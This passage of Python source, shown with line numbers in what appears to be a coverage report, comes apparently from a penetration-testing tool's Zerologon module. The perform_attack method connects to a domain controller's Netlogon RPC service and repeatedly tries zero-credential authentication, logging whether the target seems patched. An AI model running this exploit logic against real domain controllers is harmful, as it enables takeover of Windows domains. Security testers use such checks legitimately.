(self, dc_handle, dc_ip, target_computer, remoteHost)
| 44 | self.context.log.debug("Error updating zerologon status in database") |
| 45 | |
| 46 | def perform_attack(self, dc_handle, dc_ip, target_computer, remoteHost): |
| 47 | # Keep authenticating until successful. Expected average number of attempts needed: 256. |
| 48 | self.context.log.debug("Performing authentication attempts...") |
| 49 | rpc_con = None |
| 50 | try: |
| 51 | binding = epm.hept_map(remoteHost, nrpc.MSRPC_UUID_NRPC, protocol="ncacn_ip_tcp") |
| 52 | rpc_con_ = transport.DCERPCTransportFactory(binding.replace(remoteHost, dc_ip)) |
| 53 | rpc_con_.setRemoteHost(remoteHost) |
| 54 | rpc_con = rpc_con_.get_dce_rpc() |
| 55 | rpc_con.connect() |
| 56 | rpc_con.bind(nrpc.MSRPC_UUID_NRPC) |
| 57 | for _attempt in range(MAX_ATTEMPTS): |
| 58 | result = try_zero_authenticate(rpc_con, dc_handle, dc_ip, target_computer) |
| 59 | if result: |
| 60 | return True |
| 61 | else: |
| 62 | self.context.log.highlight("Attack failed. Target is probably patched.") |
| 63 | except DCERPCException: |
| 64 | self.context.log.fail("Error while connecting to host: DCERPCException, which means this is probably not a DC!") |
| 65 | |
| 66 | |
| 67 | def fail(msg): |
no test coverage detected